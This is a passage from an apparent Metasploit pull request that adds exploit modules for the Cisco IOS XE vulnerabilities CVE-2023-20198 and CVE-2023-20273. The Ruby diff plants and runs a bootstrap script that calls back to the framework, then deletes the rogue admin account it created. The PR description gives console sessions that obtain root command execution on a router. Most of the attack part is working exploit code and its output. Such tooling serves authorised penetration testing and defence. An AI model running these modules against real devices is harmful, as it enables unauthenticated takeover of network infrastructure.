+        fail_with(Failure::UnexpectedReply, 'Failed to plant the bootstrap file')
+      end
+
+      # Make the script executable.
+      success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
+        next run_os_command("chmod +x #{bootstrap_file}", admin_username, admin_password)
+      end
+
+      unless success
+        fail_with(Failure::UnexpectedReply, 'Failed to chmod the bootstrap file')
+      end
+
+      # Execute our bootstrap script via mcp_chvrf.sh, and with 'global' virtual routing and forwarding (vrf) by
+      # default. The VRF allows the executed script to route its network traffic back the the framework. The map_chvrf.sh
+      # scripts wraps a call to /usr/sbin/chvrf, which will conveniently fork the command we supply.
+      success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
+        next run_os_command("/usr/binos/conf/mcp_chvrf.sh #{datastore['CISCO_VRF_NAME']} sh #{bootstrap_file}", admin_username, admin_password)
+      end
+
+      unless success
+        fail_with(Failure::UnexpectedReply, 'Failed to execute the bootstrap file')
+      end
+    ensure
+      print_status("Removing user '#{admin_username}'")
+
+      # Leverage CVE-2023-20198 to remove the admin account we previously created.
+      unless run_cli_command("no username #{admin_username}", Mode::GLOBAL_CONFIGURATION)
+        print_warning('Failed to remove user')
+      end
+    end
+  end
+
+end

--- a/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
+++ b/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
@@ -146,7 +146,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # (as the above call to run_cli_command succeeded), however maybe this firmware version uses a different format
     # for the version information so our regex wont work.
     # Note: Version numbers can have letters in them, e.g. 17.11.99SW or 16.12.1z2
-    if res =~ /(Cisco IOS XE Software, Version [\d\S]+\.[\d\S]+\.[\d\S]+)/
+    if res =~ /(Cisco IOS XE Software, Version \S+\.\S+\.\S+)/
       version = Regexp.last_match(1)
     end
 


### PR DESCRIPTION
This pull request add two auxiliary modules for the recent Cisco IOS XE vulnerabilities that have been exploited in the wild.

The module `auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198` leverages CVE-2023-20198 to perform unauthenticated remote CLI command execution. Horizion3ai have a [two](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/') [part](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/) writeup with technical details on the vuln.

The module `auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273` leverages both CVE-2023-20198 and CVE-2023-20273 to perform unauthenticated remote OS command execution. Leakix has a [writeup](https://blog.leakix.net/2023/10/cisco-root-privesc/) with technical details on the second CVE. The reason this module is an aux module and not an exploit module is that, even though we get OS command execution, the OS seems to be hardened and running a Metasploit payload is non trivial (at least from some early testing on the device I have). I am investigating this further.


## Example Usage (CVE-2023-20198)
```
msf6 > use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set RHOST 192.168.86.57
RHOST => 192.168.86.57
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set CMD "exit\\nshow version"
CMD => exit\nshow version
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run
[*] Running module against 192.168.86.57


Cisco IOS XE Software, Version 16.12.03
Cisco IOS Software [Gibraltar], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 16.12.3, RELEASE SOFTWARE (fc5)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2020 by Cisco Systems, Inc.
Compiled Mon 09-Mar-20 21:50 by mcpre
...snip...
```

## Example Usage (CVE-2023-20198 + CVE-2023-20273)
```
msf6 > use auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set RHOST 192.168.86.57
RHOST => 192.168.86.57
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set CMD "id"
CMD => id
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run
[*] Running module against 192.168.86.57

[*] uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0

[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run CMD="uname -a"
[*] Running module against 192.168.86.57

[*] Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux

[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > 
```
